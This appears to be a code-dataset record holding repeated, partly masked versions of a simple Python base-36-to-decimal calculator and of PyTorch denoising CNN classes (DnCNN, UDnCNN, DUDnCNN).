digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') main() <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Wed Dec 19 09:41:08 2018 hexatrigesimal to decimal calculator, base 36 encoding; use of letters with digits. @author: susan """ ## create a dictionary as reference for BASE 36 calculations WORD = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" # digits of BASE 36 BASE = {} for i, item in enumerate(WORD): # iterate through word BASE.update({WORD[i]:i}) # update BASE dictionary with key:value pair # input function, BASE 36 numbers for calculations. def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input("please enter a BASE 36 number, e.g. A36Z :> ") num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(" **error** user input failed\n") print("do you want to re enter number") ans = input("y or n ") ans = ans.upper() if ans == "Y": num = enter_num() else: num = None return num # make list function. def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst # convert function. def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print("position right to left is >", i+1, "value is ", BASE[(num_lst[i])], "decimal value is", (36**i) * BASE[(num_lst[i])]) dec += (36**i) * BASE[(num_lst[i])] return dec # main program flow function. def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print("decimal value of BASE 36 number", num, "is", dec) else: print("user terminated program") # program start. main()
flexible
{ "blob_id": "5a265ecb9f1d6d0e4a5c66d241fbfe4a6df97825", "index": 8191, "step-1": "<mask token>\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\n<mask token>\n", "step-3": "<mask token>\nfor i, item in enumerate(WORD):\n BASE.update({WORD[i]: i})\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\nmain()\n", "step-4": "<mask token>\nWORD = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nBASE = {}\nfor i, item in enumerate(WORD):\n BASE.update({WORD[i]: i})\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\nmain()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 19 09:41:08 2018\r\nhexatrigesimal to decimal calculator,\r\nbase 36 encoding; use of letters with digits.\r\n@author: susan\r\n\"\"\"\r\n## create a dictionary as reference for BASE 36 calculations\r\nWORD = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\" # digits of BASE 36\r\nBASE = {}\r\nfor i, item in enumerate(WORD): # iterate through word\r\n BASE.update({WORD[i]:i}) # update BASE dictionary with key:value pair\r\n# input function, BASE 36 numbers for calculations.\r\ndef enter_num():\r\n \"\"\" get user input and do error checking for illegal digits.\r\n returns\r\n -------\r\n num\r\n \"\"\"\r\n num = input(\"please enter a BASE 36 number, e.g. A36Z :> \")\r\n num = num.upper()\r\n for digit in num:\r\n digit = digit.upper()\r\n if digit not in WORD:\r\n print(\" **error** user input failed\\n\")\r\n print(\"do you want to re enter number\")\r\n ans = input(\"y or n \")\r\n ans = ans.upper()\r\n if ans == \"Y\":\r\n num = enter_num()\r\n else:\r\n num = None\r\n return num\r\n# make list function.\r\ndef mk_num_lst(num):\r\n \"\"\" make BASE 36 number from user into a list.\r\n reverse list so digit are read left to right.\r\n returns\r\n -------\r\n num_lst\r\n \"\"\"\r\n num_lst = []\r\n for digit in num:\r\n num_lst.append(digit)\r\n num_lst.reverse()\r\n return num_lst\r\n# convert function.\r\ndef convert(num_lst):\r\n \"\"\" convert each digit to power of 36 appropriately.\r\n prints result in decimal.\r\n returns\r\n -------\r\n dec\r\n \"\"\"\r\n dec = 0\r\n for i in range(0, len(num_lst)):\r\n print(\"position right to left is >\", i+1,\r\n \"value is \", BASE[(num_lst[i])],\r\n \"decimal value is\",\r\n (36**i) * BASE[(num_lst[i])])\r\n dec += (36**i) * BASE[(num_lst[i])]\r\n return dec\r\n# main program flow function.\r\ndef main():\r\n \"\"\"\r\n process valid user input or\r\n terminate program on failed input.\r\n \"\"\"\r\n num = enter_num()\r\n if num is not None:\r\n num_lst = mk_num_lst(num)\r\n dec = convert(num_lst)\r\n print(\"decimal value of BASE 36 number\", num, \"is\", dec)\r\n else:\r\n print(\"user terminated program\")\r\n# program start.\r\nmain()\r\n", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
<|reserved_special_token_0|> class UDnCNN(NNRegressor): <|reserved_special_token_0|> <|reserved_special_token_0|> class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> <|reserved_special_token_0|> class DnCNN(NNRegressor): <|reserved_special_token_0|> <|reserved_special_token_0|> class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> <|reserved_special_token_0|> class DnCNN(NNRegressor): <|reserved_special_token_0|> def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i + 1](h))) y = self.conv[D + 1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> import os import numpy as np import torch from torch import nn from torch.nn import functional as F import torch.utils.data as td import torchvision as tv import pandas as pd from PIL import Image from matplotlib import pyplot as plt from utils import imshow, NNRegressor class DnCNN(NNRegressor): def __init__(self, D, C=64): super(DnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i + 1](h))) y = self.conv[D + 1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> import os import numpy as np import torch from torch import nn from torch.nn import functional as F import torch.utils.data as td import torchvision as tv import pandas as pd from PIL import Image from matplotlib import pyplot as plt from utils import imshow, NNRegressor class DnCNN(NNRegressor): def __init__(self, D, C=64): super(DnCNN, self).__init__() self.D = D # convolution layers self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i+1](h))) y = self.conv[D+1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D # convolution layers self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D//2-1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D//2-1, D//2+1): h = F.relu(self.bn[i](self.conv[i+1](h))) for i in range(D//2+1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D+1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D # compute k(max_pool) and l(max_unpool) k = [0] k.extend([i for i in range(D//2)]) k.extend([k[-1] for _ in range(D//2, D+1)]) l = [0 for _ in range(D//2+1)] l.extend([i for i in range(D+1-(D//2+1))]) l.append(l[-1]) # holes and dilations for convolution layers holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)] dilations = [i+1 for i in holes] # convolution layers self.conv = nn.ModuleList() self.conv.append( nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1], dilation=dilations[i+1]) for i in range(D)]) self.conv.append( nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1])) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D//2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i+1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D//2 - 1, D//2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i+1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D//2 + 1, D): j = i - (D//2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D+1](h) + x return y
flexible
{ "blob_id": "9c60d82d42716abb036dc7297a2dca66f0508984", "index": 7626, "step-1": "<mask token>\n\n\nclass UDnCNN(NNRegressor):\n <mask token>\n <mask token>\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-2": "<mask token>\n\n\nclass DnCNN(NNRegressor):\n <mask token>\n <mask token>\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = 